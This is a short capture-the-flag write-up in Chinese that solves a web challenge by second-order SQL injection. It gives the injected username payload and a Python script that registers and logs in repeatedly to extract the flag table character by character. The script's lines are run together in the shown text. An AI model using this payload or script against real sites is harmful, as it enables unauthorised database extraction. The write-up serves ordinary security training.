进入题目后各种按钮按了都没有反应
御剑扫了一下文件

发现了register.php文件 估计注入点在register.php页面上
在注册界面创建了一个账号root 密码123456 登录进去
这里应该会用到插入数据库的语句
insert into users(username,password) values('root',123456)
想了想这里可能可以利用二次注入 尝试一下
email:cyh@qq.comusername:0' + ascii(substr((select database()) from 1 for 1)) + '0password:admin
![T3)ZCRIY$7T_$1EWX]8CEW0.png](/uploads/projects/xbx0d@torze3/6bfe5a0d722e2c0898a917dddb1b259c.png)
这里可以写一个python脚本来获取数据
import requestsimport redef SQL():global register_url,login_urlfor i in range(1,100):register_payload = {'email' : '333{}@qq.com'.format(i),'username' : "0' + ascii(substr((select * from flag) from {} for 1)) + '0".format(i),'password' : 'admin'}res1 = requests.post(url=register_url,data=register_payload)login_payload = {'email' : '333{}@qq.com'.format(i),'password' : 'admin'}res2 = requests.post(url=login_url,data=login_payload)#<span class="user-name">119</span>code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',res2.text)print(chr(int(code.group(1))),end='')if __name__=="__main__":register_url = "http://111.200.241.244:65486/register.php"login_url = "http://111.200.241.244:65486/login.php"SQL()
运行得到flag
